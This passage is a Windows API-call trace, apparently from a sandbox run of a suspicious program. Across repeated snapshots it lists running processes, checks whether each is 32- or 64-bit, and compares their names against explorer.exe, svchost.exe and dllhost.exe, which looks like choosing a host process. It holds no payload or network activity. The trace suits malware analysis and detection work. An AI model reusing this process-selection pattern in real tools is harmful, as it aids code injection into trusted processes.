lpString2="explorer.exe") returned -1 [0254.400] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0254.400] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0254.400] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0254.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0254.401] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.401] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.401] CloseHandle (hObject=0xec) returned 1 [0254.401] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0254.401] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0254.401] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0254.401] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0254.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0254.401] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.401] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.401] CloseHandle (hObject=0xec) returned 1 [0254.401] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0254.401] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0254.401] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0254.401] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0254.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0254.402] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.402] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.402] CloseHandle (hObject=0xec) returned 1 [0254.402] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0254.402] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0254.402] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0254.402] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0254.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0254.403] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.403] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.403] CloseHandle (hObject=0xec) returned 1 [0254.403] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0254.403] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0254.403] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0254.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0254.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0254.404] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0254.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0254.404] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0254.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0254.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0254.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0254.406] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.406] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.406] CloseHandle (hObject=0xec) returned 1 [0254.406] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0254.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0254.406] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.406] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.406] CloseHandle (hObject=0xec) returned 1 [0254.406] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0254.407] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.407] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.407] CloseHandle (hObject=0xec) returned 1 [0254.407] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0254.407] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0254.408] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.408] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.408] CloseHandle (hObject=0xec) returned 1 [0254.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0254.409] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.409] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.409] CloseHandle (hObject=0xec) returned 1 [0254.409] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0254.409] CloseHandle (hObject=0xe8) returned 1 [0254.409] Sleep (dwMilliseconds=0x3e8) [0255.412] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0255.413] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0255.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0255.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0255.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0255.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0255.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0255.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0255.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0255.416] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0255.416] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0255.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0255.417] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0255.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0255.417] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0255.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0255.418] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0255.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0255.418] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0255.419] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0255.419] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0255.420] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0255.420] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0255.421] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0255.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0255.421] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0255.422] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0255.422] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0255.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0255.423] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.423] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.423] CloseHandle (hObject=0xec) returned 1 [0255.423] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0255.423] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0255.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0255.424] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.424] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.424] CloseHandle (hObject=0xec) returned 1 [0255.424] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0255.424] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0255.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0255.425] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0255.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0255.425] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.426] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.426] CloseHandle (hObject=0xec) returned 1 [0255.426] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0255.426] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0255.426] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0255.426] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0255.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0255.426] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.426] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.426] CloseHandle (hObject=0xec) returned 1 [0255.426] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0255.426] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0255.426] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0255.426] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0255.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0255.427] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.427] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.427] CloseHandle (hObject=0xec) returned 1 [0255.427] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0255.427] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0255.427] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0255.427] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0255.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0255.428] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.428] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.428] CloseHandle (hObject=0xec) returned 1 [0255.428] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0255.428] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0255.428] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0255.428] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0255.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0255.428] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.428] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.428] CloseHandle (hObject=0xec) returned 1 [0255.429] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0255.429] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0255.429] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0255.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0255.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0255.429] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.429] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.429] CloseHandle (hObject=0xec) returned 1 [0255.429] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0255.429] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0255.429] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0255.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0255.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0255.430] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.430] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.430] CloseHandle 